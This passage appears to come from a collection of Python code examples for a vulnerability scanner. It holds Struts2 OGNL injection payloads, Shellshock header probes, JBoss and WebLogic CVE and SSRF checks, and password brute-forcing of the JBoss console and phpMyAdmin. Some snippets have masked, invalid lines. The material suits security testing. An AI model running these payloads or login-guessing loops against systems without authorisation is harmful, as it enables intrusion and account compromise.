                "S2-009B":"class['classLoader'].jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class['classLoader'].jarPath)('meh')]",
                "S2-013":"a=1${(%23_memberAccess['allowStaticMethodAccess']=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.println(1111*2222),%23k8out.close())}",
                "S2-016A":"redirect:${1111*2222}",
                "S2-016B":"redirectAction:${1111*2222}",
                "S2-016C":"action:${1111*2222}",
                "S2-019A":"debug=command&expression=1111*2222",
                "S2-019B":"debug=command&expression=%23_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime()",
                "S2-020":"Class.ClassLoader.parent=GENXOR",
                "S2-021":"Class['ClassLoader'].resources=GENXOR",
                "S2-022A":"Class.ClassLoader.parent=GENXOR",
                "S2-022B":"Class['ClassLoader'].resources=GENXOR",
                }
    # success collects the digit lists of advisories already confirmed, so the
    # A/B/C variants of one advisory are presumably meant to be skipped.
    success = []
    # payload maps a confirmed payload id to tm[0] of its response.
    payload = {}
    url = protocol+'://'+ip+':'+str(port)
    # `id` shadows the builtin of the same name inside this function.
    for id in payloads:
        # See the TypeError note in the docstring: the pattern here is a list.
        if not re.search(list(filter(str.isdigit,id)),str(success)):
            http = httpparse()
            tm = http.httpreq("POST",protocol,ip,str(port),data=payloads[id])
            if re.search('S2-016', id):
                # 2468642 is 1111*2222: its presence means the expression was
                # evaluated by the server.
                if re.search('2468642', str(tm[1][1])):
                    success.append(list(filter(str.isdigit,id)))
                    payload[id] = tm[0]
            elif id == "S2-020" or id == "S2-021":
                # Hit when the probe yields 404 but an empty POST does not.
                if tm[1][0] == 404 and http.httpreq('POST',protocol,ip,str(port), data='')[1][0] != 404:
                    success.append(list(filter(str.isdigit,id)))
                    payload[id] = tm[0]
            elif re.search('S2-022', id):
                # Same 404-difference test, with the probe carried in a Cookie.
                if http.httpreq('GET', protocol,ip,port, header={"Cookie":payloads[id]})[1][0] == 404 and http.httpreq('get',protocol,ip,port)[1][0] != 404:
                    success.append(list(filter(str.isdigit,id)))
                    payload[id] = tm[0]
            else:
                if re.search('2468642|java\.lang\.Runtime@', tm[1][2], re.I):
                    success.append(list(filter(str.isdigit,id)))
                    payload[id] = tm[0]
    for k in list(payload.keys()):
        if payload[k] != 404:
            msg = 'There is a struts2 vul , payloadid is'+k+'.'
            print(msg)
            return True,url,msg
        else:
            pass
    else:
        # for/else: runs when no confirmed payload returned above.
        msg = 'There is no struts2 vul'
        return True,url,msg
Exemplo n.º 15
 def protocolurlset(ip, port):
     """Find the first known middleware console path that answers on ``ip:port``.

     Walks a fixed list of ``module|path`` entries (WebSphere, WebLogic and
     JBoss consoles). Each path is tried over https first, then over http.

     Returns:
         ``(protocol, ip, port, path, module)`` for the first path that
         answers, with ``port`` as a string; ``('', ip, port, '', '')`` when
         none does. When a probe raises, the exception is printed and the
         function returns ``None`` implicitly.
     """
     known_consoles = [
         'websphereconsole|/ibm/console/logon.jsp',
         'weblogicconsole|/console/login/LoginForm.jsp',
         'jbossadmin|/admin-console/index.seam',
         'jbossconsole|/jmx-console/', 'jbosspass|/web-console/',
         'jboss|/invoker/JMXInvokerServlet'
     ]
     client = httpparse()
     ip = protocoparse.judegIp(ip)
     port = int(port)
     try:
         for entry in known_consoles:
             module, path = entry.split('|')

             over_tls = client.httptest('https', '%s' % ip, port, path)
             if over_tls and over_tls[0] not in (404, 504, 502):
                 return 'https', ip, str(port), path, module

             # Unused value, kept because the concatenation raises (and so
             # ends the scan via the except below) when ip is not a str.
             domain = 'http://' + ip + ':' + str(port)
             over_plain = client.httptest('http', '%s' % ip, port, path)
             # NOTE(review): str(...) != [] compares a str with a list and is
             # always True; it is kept so behavior stays unchanged.
             if (over_plain and over_plain[0] not in (404, 400, 504)
                     and str(over_plain[2]) != []):
                 return 'http', ip, str(port), path, module

         return '', ip, str(port), '', ''
     except Exception as e:
         print(e)
Exemplo n.º 16
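def verify(protocol, ip, port):
    """Check CGI URLs on the target for Shellshock via an echoed marker.

    For every URL returned by ``test_url`` that contains ``'cgi'``, each
    probe string is sent in the ``cookie``, ``User-Agent`` and ``Referrer``
    request headers, and the second element of the response (presumably
    the response headers) is searched for the marker ``hczjhdqtjh``.

    The match is a plain substring test, so a server that merely reflects
    request header values into its own response headers also matches.
    A hit should be confirmed before it is reported.

    Returns:
        ``(True, url, 'v45', msg)`` on the first match, where ``url`` is
        the matching entry from ``test_url``; otherwise
        ``(False, base_url, 'v0', msg)``.
    """
    oldurl = protocol + '://' + ip + ':' + str(port)
    print('testing if shell shock vul')
    url_list = test_url(protocol, ip, port, timeout=10)
    try:
        flag_list = [
            '() { :; }; echo; echo X-Bash-Test: hczjhdqtjh',
            'env x="() { :;}; echo hczjhdqtjh" bash -c "echo this is a test"',
            '() { :;};a="hczjhdqtjh";echo "a: $a"'
        ]
        for url in url_list:
            if 'cgi' not in url:
                continue
            for flag in flag_list:
                header = {
                    'cookie': flag,
                    'User-Agent': flag,
                    'Referrer': flag
                }
                try:
                    http = httpparse()
                    tm = http.httpreq('GET',
                                      protocol,
                                      ip,
                                      port,
                                      url,
                                      header=header)
                    res_header = str(tm[1])
                except Exception as e:
                    # A failed request must not end the whole check: skip
                    # this probe instead of falling through to a test on
                    # a response that was never received.
                    print(str(e))
                    continue
                if "hczjhdqtjh" in res_header:
                    msg = 'There is shell shock vul on ' + oldurl + url + ' .'
                    number = 'v45'
                    return True, url, number, msg
    except Exception as e:
        print(str(e))
    msg = 'There is no shell shock vul'
    number = 'v0'
    return False, oldurl, number, msg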
Exemplo n.º 17
def verify(protocol, ip, port):
    """Fingerprint check for CVE-2017-12149 on a JBoss AS endpoint.

    Sends a single GET to ``/invoker/readonly`` and reports a hit when the
    status is 500 and the body contains ``JBoss Web`` (case-insensitive).
    No serialized object is sent: a hit only shows that the endpoint
    answers the way this check expects and should be confirmed against the
    installed version and patch level.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v62'`` on a hit
        and ``'v0'`` otherwise. A request error is reported as not found,
        with the exception text as ``msg``.
    """
    url = ''.join((protocol, '://', ip, ':', str(port)))
    print('testing if CVE-2017-12149 JBOSS AS 6.x unserialized vul')
    http = httpparse()
    tag = 'JBoss Web'
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/invoker/readonly')
        matched = (re.search(tag, str(tm[2]), re.I)) and tm[0] == 500
    except Exception as e:
        return False, url, 'v0', str(e)
    if matched:
        return (True, url, 'v62',
                'There is CVE-2017-12149 JBOSS AS 6.x unserialized vul on url: ' + url + ' .')
    return False, url, 'v0', 'There is no CVE-2017-12149 JBOSS AS 6.x unserialized vul'
Exemplo n.º 18
def verify(protocol, ip, port):
    """Report whether an e-Mobile login page is reachable at ``/login.do``.

    A hit requires status 200 and the bytes ``e-Mobile`` (case-insensitive)
    in the response body. The body is searched with a bytes pattern, so
    ``tm[2]`` has to be bytes; anything else raises and is reported as not
    found with the exception text.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v21'`` on a hit
        and ``'v0'`` otherwise.
    """
    url = ''.join((protocol, '://', ip, ':', str(port)))
    http = httpparse()
    print('testing if e-Mobile backstage')
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/login.do')
        found = tm[0] == 200 and re.search(b'e-Mobile', tm[2], re.I)
        if not found:
            return False, url, 'v0', 'Ther is no e-Mobile backstage'
        msg = 'e-Mobile backstage is:' + url + '/login.do'
        print(msg)
        return True, url, 'v21', msg
    except Exception as e:
        return False, url, 'v0', str(e)
Exemplo n.º 19
def verify(protocol, ip, port):
    """Fingerprint check for CVE-2017-7504 (JBossMQ HTTP invocation layer).

    Sends a single GET to ``/jbossmq-httpil/HTTPServerILServlet`` and
    reports a hit when the body contains the servlet banner, the status is
    200 and the second response element (presumably the headers) mentions
    ``JBoss``. No serialized object is sent, so a hit means the servlet is
    exposed, not that deserialization was exercised.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v61'`` on a hit
        and ``'v0'`` otherwise. A request error is reported as not found,
        with the exception text as ``msg``.
    """
    url = ''.join((protocol, '://', ip, ':', str(port)))
    print('testing if CVE-2017-7504 JBOSSMQ JMS colony unserialized vul')
    http = httpparse()
    tag = 'This is the JBossMQ HTTP-IL'
    try:
        tm = http.httpreq('GET', protocol, ip, port,
                          '/jbossmq-httpil/HTTPServerILServlet')
        banner_seen = re.search(tag, str(tm[2]), re.I)
        matched = (banner_seen and tm[0] == 200
                   and re.search('JBoss', str(tm[1]), re.I))
    except Exception as e:
        return False, url, 'v0', str(e)
    if matched:
        return (True, url, 'v61',
                'There is CVE-2017-7504 JBOSSMQ JMS colony unserialized vul on url: ' + url + ' .')
    return False, url, 'v0', 'There is no CVE-2017-7504 JBOSSMQ JMS colony unserialized vul'
def verify(protocol, ip, port):
    """Check whether the JBoss status page is readable without credentials.

    Sends a single GET to ``/status?full=true`` and reports a hit when the
    body contains ``Max processing time``, the status is 200 and the second
    response element (presumably the headers) mentions ``JBoss``.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v91'`` on a hit
        and ``'v0'`` otherwise. A request error is reported as not found,
        with the exception text as ``msg``.
    """
    url = ''.join((protocol, '://', ip, ':', str(port)))
    print('testing if jboss information disclose vul')
    http = httpparse()
    tag = 'Max processing time'
    try:
        tm = http.httpreq('GET', protocol, ip, port, '/status?full=true')
        body_hit = re.search(tag, str(tm[2]), re.I)
        matched = (body_hit and tm[0] == 200
                   and re.search('JBoss', str(tm[1]), re.I))
    except Exception as e:
        return False, url, 'v0', str(e)
    if not matched:
        return False, url, 'v0', 'There is no jboss information disclose vul'
    return (True, url, 'v91',
            'There is jboss information disclose vul on url: ' + url + '/status?full=true.')
Exemplo n.º 21
def verify(protocol, ip, port):
    """Check a JBoss admin console login for a weak ``admin`` password.

    The console page is fetched first; only when the status is 200 and the
    second response element (presumably the headers) mentions ``jboss`` are
    the candidate passwords in ``psw`` posted to the login form.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v5'`` on a hit and
        ``'v0'`` otherwise.

    NOTE(review): two lines below contain ``'******'`` where an expression
    appears to have been masked when the listing was published; as shown
    they are not valid Python.
    """
    url = protocol + '://' + ip + ':' + str(port)
    print('testing if JBOSS-adminConsole')
    http = httpparse()
    try:
        tm = http.httpreq('GET', protocol, ip, port,
                          '/admin-console/index.seam')
        if re.search('jboss', str(tm[1]), re.I) and tm[0] == 200:
            #header = {"Cookie":"JSESSIONID=A04D33474CB89BA12F4DECA06F2B1003"}
            # `psw` is not defined in this function; presumably a
            # module-level password list. TODO confirm.
            for password in psw:
                # NOTE(review): masked in the published listing (see docstring).
                data = 'login_form=login_form&login_form%3Aname=admin&login_form%3Apassword='******'&login_form%3Asubmit=Login&javax.faces.ViewState=j_id4'
                data = data.encode(encoding='utf-8')
                tm = http.httpreq('POST',
                                  protocol,
                                  ip,
                                  port,
                                  '/admin-console/login.seam',
                                  data=data)
                # NOTE(review): success is inferred from the ABSENCE of the
                # failure text, so any other response (error page, lockout
                # notice, redirect) is reported as a valid login. Checking
                # for a positive indicator would cut false positives.
                if not re.search(b'attempt failed', tm[2], re.I):
                    # NOTE(review): masked in the published listing. The
                    # message carries the matched password and is printed,
                    # so scan output must be handled as sensitive.
                    msg = 'Found JBOSS-adminConsole! in url:' + url + '/admin-console/index.seam with password: '******'.'
                    print(msg)
                    number = 'v5'
                    return True, url, number, msg
            else:
                # for/else: reached once every candidate has been tried
                # without a hit (the loop never breaks).
                msg = 'Cannot found JBOSS-adminConsole! in url:' + url + '/admin-console/index.seam'
                number = 'v0'
                return False, url, number, msg
        else:
            msg = 'The url:' + url + 'is not jboss'
            number = 'v0'
            return False, url, number, msg
    except Exception as e:
        print(e)
        msg = 'error'
        number = 'v0'
        return False, url, number, msg
    # Unreachable as written: every path through the try/except returns.
    msg = 'There is no JBOSS-adminConsole weakpass vul on url'
    number = 'v0'
    return False, url, number, msg
Exemplo n.º 22
def verify(protocol, ip, port):
    """Check the WebLogic UDDI explorer for server-side request forgery.

    Requests ``SearchPublicRegistries.jsp`` with ``operator`` set to a
    hard-coded private (RFC 1918) address and reports a hit when the status
    is 200 and the body contains the server's error text naming that
    address. ``tag`` is used as a regular expression, so the dots in it
    match any character.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v60'`` on a hit
        and ``'v0'`` otherwise. A request error is reported as not found,
        with the exception text as ``msg``.
    """
    url = ''.join((protocol, '://', ip, ':', str(port)))
    print('testing if weblogic ssrf vul')
    http = httpparse()
    tag = 'Received a response from url: http://10.30.1.61 which did not have a valid SOAP'
    probe_path = '/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.30.1.61&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'
    try:
        tm = http.httpreq('GET', protocol, ip, port, probe_path)
        matched = (re.search(tag, str(tm[2]), re.I)) and tm[0] == 200
    except Exception as e:
        return False, url, 'v0', str(e)
    if matched:
        return True, url, 'v60', 'There is weblogic ssrf vul on url: ' + url + ' .'
    return False, url, 'v0', 'There is no weblogic ssrf vul'
Exemplo n.º 23
 def http_url(self, method, url, postdata='', header={}):
     """Send a GET or POST for ``url`` and return ``(full_url, response)``.

     ``url`` is either absolute (starts with ``http``, case-insensitive)
     or a path relative to ``self.protocol``/``self.ip``/``self.port``.
     Any ``method`` other than ``'GET'`` is sent as POST. GET requests
     pass ``header`` only and POST requests pass ``postdata`` only.

     Absolute URLs are split by hand on ``/``:
       * a URL with no path, or one that ends in ``/``, is requested as
         ``/``;
       * the first path segment is placed into a regular expression
         unescaped, so regex metacharacters in it change the match or
         raise;
       * the port defaults to 443 for ``https`` and 80 otherwise.

     The shared default ``header`` dict is passed through to ``httpreq``
     and is not modified here.
     """
     http = httpparse()

     def _send(scheme, host, port, path):
         # One place for the GET/POST split used by every branch.
         if method == 'GET':
             return http.httpreq('GET', scheme, host, port, path,
                                 header=header)
         return http.httpreq('POST', scheme, host, port, path,
                             data=postdata)

     if not re.search('^http', url, re.I):
         # Relative path: resolve against the instance's own target.
         url_all = self.protocol + '://' + self.ip + ':' + str(
             self.port) + '/' + url
         tm = _send(self.protocol, self.ip, self.port, '/' + url)
         return (url_all, tm)

     pieces = url.split('/')
     if len(pieces) > 3 and pieces[-1] != '':
         first_seg = pieces[3]
         url_tail = re.search(
             '/' + first_seg + '$|/' + first_seg + '/.*', url,
             re.I).group()
     else:
         url_tail = '/'

     scheme = pieces[0].replace(':', '')
     authority = pieces[2]
     if re.search(':', authority):
         host = authority.split(':')[0]
         port = int(authority.split(':')[1])
     else:
         host = authority
         port = 443 if re.search('^https', url, re.I) else 80

     tm = _send(scheme, host, port, url_tail)
     return (url, tm)
Exemplo n.º 24
    def run(self):
        """Discover ``.action``/``.do`` URLs on the target and test them.

        Steps, all inside one ``try`` whose errors are only printed:
          1. Request ``/`` and follow either an HTTP redirect or a
             ``location = '...'`` assignment found in the page body.
          2. Collect action URLs from every entry in ``self.root_urls``.
          3. Probe a fixed list of common action names.
          4. Call ``self.struts2`` on each candidate that answers, stopping
             at the first non-empty result.

        Returns:
            The value returned by ``self.struts2`` for the first URL that
            produced a non-empty result, otherwise the initial empty dict.
        """
        action_url = []
        result = {}
        http2 = httpparse()
        #===Confirm root(location = ''/location = "")
        try:
            tm = http2.httpreq('GET', self.protocol, self.ip, self.port, '/')
            if tm[0] == 301 or tm[0] == 302:
                # Second request with header='location'; element [1] of its
                # result is handed to newself(). Presumably this fetches the
                # redirect target -- confirm against httpreq.
                tm = http2.httpreq('GET',
                                   self.protocol,
                                   self.ip,
                                   self.port,
                                   '/',
                                   header='location')[1]
                self.newself(tm)
            else:
                # Rewrites everything from '//' up to 'location' on a line,
                # presumably to drop commented-out assignments before the
                # search below.
                new_tm = re.sub(b'//.*location', b'//aa', tm[2])
                # re.sub with bytes patterns returns bytes, so str(new_tm)
                # is the b'...' repr and the regex runs over that escaped
                # text rather than the decoded page.
                if re.search('location.*=\s*\'.*\'|location.*=\s*\".*\"',
                             str(new_tm), re.I):
                    locat_url_g = re.search(
                        'location.*=\s*\'(.*)\'|location.*=\s*\"(.*)\"',
                        str(new_tm), re.I)
                    # Group 1 is the single-quoted form, group 2 the
                    # double-quoted one.
                    if locat_url_g.group(1) is None:
                        locat_url = locat_url_g.group(2)
                    else:
                        locat_url = locat_url_g.group(1)
                    # Absolute target: re-point the instance; otherwise
                    # queue it as another root path.
                    if re.search('http', locat_url, re.I):
                        self.newself(locat_url)
                    else:
                        self.root_urls.append(locat_url)

            #print self.protocol, self.ip, self.port, self.root_urls

            #===fetch self.root_urls for js and action/do
            for root_url in self.root_urls:
                # Keep the part of the root URL up to the .action/.do suffix.
                if re.search('\.action|\.do', root_url, re.I):
                    action_url.append(
                        re.search('.*\.action|.*\.do', root_url, re.I).group())
                tm = self.http_url('GET', root_url)[1]
                action_url = action_url + self.findaction(str(
                    tm[2])) + self.actioninjs(str(tm[2]))

            print(self.ip, self.port, self.protocol, self.root_urls)
            #===guess index.action/login.action
            if len(self.root_urls) == 1:
                for m in [
                        'index.action', 'index.do', 'login.action', 'login.do',
                        'test.action', 'test.do', 'default.action',
                        'default.do'
                ]:
                    # m is used as a regex against the list's repr, so its
                    # '.' matches any character.
                    if not re.search(m, str(action_url), re.I):
                        rp_code = http2.httpreq('GET', self.protocol, self.ip,
                                                self.port, '/' + m)[0]
                        # Any status outside this list counts as "exists".
                        if rp_code not in [401, 403, 404, 501, 502, 503, 504
                                           ] and rp_code > 1:
                            action_url.append(m)
            else:
                # NOTE(review): every length other than 1 lands here,
                # including an empty list, where self.root_urls[1] raises
                # IndexError (caught by the except below).
                root_urls_ele = self.root_urls[1].split('/')
                if re.search('\.', root_urls_ele[-1]):
                    # NOTE(review): str.rstrip removes a set of characters,
                    # not a suffix, so this can strip more than the file
                    # name when the directory ends in the same characters.
                    root_path = self.root_urls[1].rstrip(root_urls_ele[-1])
                else:
                    root_path = self.root_urls[1]
                if not re.search('/$', root_path):
                    root_path = root_path + '/'
                for m in [
                        'index.action', 'index.do', 'login.action', 'login.do',
                        'test.action', 'test.do', 'default.action',
                        'default.do'
                ]:
                    if not re.search(m, str(action_url), re.I):
                        # Probe the name at the site root ...
                        rp_code = http2.httpreq('GET', self.protocol, self.ip,
                                                self.port, '/' + m)[0]
                        if rp_code not in [401, 403, 404, 501, 502, 503, 504
                                           ] and rp_code > 1:
                            action_url.append(m)
                        # ... and again under the second root's directory.
                        rp_code = self.http_url('GET', root_path + m)[1][0]
                        if rp_code not in [401, 403, 404, 501, 502, 503, 504
                                           ] and rp_code > 1:
                            action_url.append(root_path + m)
            print('>>>>>>>>>>>action_url:', action_url)
            #===Check St2
            for url in action_url:
                # URLs that already carry a query parameter are skipped.
                if not re.search('=', url):
                    rp_code = self.http_url('GET', url)[1][0]
                    if rp_code not in [401, 403, 404, 501, 502, 503, 504
                                       ] and rp_code > 1:
                        result = self.struts2(url)
                        # Stop at the first URL that yields a finding.
                        if len(result) > 0:
                            break

        except Exception as e:
            # Best-effort: any failure above is printed and whatever result
            # holds at that point is returned.
            print(str(e))

        return result
def verify(protocol, ip, port):
    """Check a phpMyAdmin login for weak username/password pairs.

    The login form is looked for at ``/`` and then at ``/phpmyadmin/``.
    If neither page carries the form markers the function returns early.
    Otherwise each user in a fixed list is tried with every password from
    ``getpassdict().get_pass_dict()``, fetching a fresh token per attempt.

    Points a reviewer should know:
      * Once the form is found the login URL is rebuilt with a hard-coded
        ``http://`` scheme, whatever ``protocol`` was passed.
      * An exception during the form lookup is swallowed, and the attempts
        then run against the base URL.
      * The success message contains the matched username and password and
        is printed, so scan output must be handled as sensitive.
      * Three ``URLError`` failures in total end the check.

    Returns:
        ``(found, url, number, msg)``; ``number`` is ``'v74'`` on a hit
        and ``'v0'`` otherwise.
    """
    url = protocol+'://'+ip+':'+str(port)
    flag_list = [b'src="navigation.php', b'frameborder="0" id="frame_content"', b'id="li_server_type">',
                 b'class="disableAjax" title=']
    user_list = ['root', 'mysql', 'wwwroot', 'admin', 'zte']
    error_i = 0
    print('testing if phpmyadmin weak pass vul')
    http = httpparse()

    def _is_login_page(body):
        # Both markers of the phpMyAdmin login form must be present.
        return b'input_password' in body and b'name="token"' in body

    try:
        tm = http.httpreq('GET', protocol, ip, port, '/')
        if _is_login_page(tm[2]):
            url = 'http://' + ip + ":" + str(port) + "/index.php"
        else:
            newtm = http.httpreq('GET', protocol, ip, port, '/phpmyadmin/')
            if not _is_login_page(newtm[2]):
                return False, url, 'v0', 'It is not phpmyadmin server on url:' +url+'.'
            url = 'http://' + ip + ":" + str(port) + "/phpmyadmin/index.php"
    except Exception:
        pass

    psw = getpassdict().get_pass_dict()
    for user in user_list:
        for pass_ in psw:
            try:
                opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
                login_page = opener.open(url, timeout=10).read().decode()
                token = re.search('name="token" value="(.*?)" />', login_page)
                # A page without a token raises AttributeError here and
                # the attempt is skipped by the generic handler below.
                token_hash = urllib.parse.quote(token.group(1))
                postdata = "pma_username=%s&pma_password=%s&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci&token=%s" % (
                    user, pass_, token_hash)
                reply = opener.open(url, postdata.encode(encoding="utf-8"), timeout=5).read()
                if any(flag in reply for flag in flag_list):
                    msg = 'There is phpmyadmin weak pass vul on: %s , with username: %s and password: %s.' %(url,user,pass_)
                    print(msg)
                    return True, url, 'v74', msg
            except urllib.error.URLError:
                error_i += 1
                if error_i >= 3:
                    return False, url, 'v0', 'There is no phpmyadmin server on url:' +url+'.'
            except Exception:
                pass
    return False, url, 'v0', 'Therer is no phpmyadmin weakpass vul in url:' +url+'.'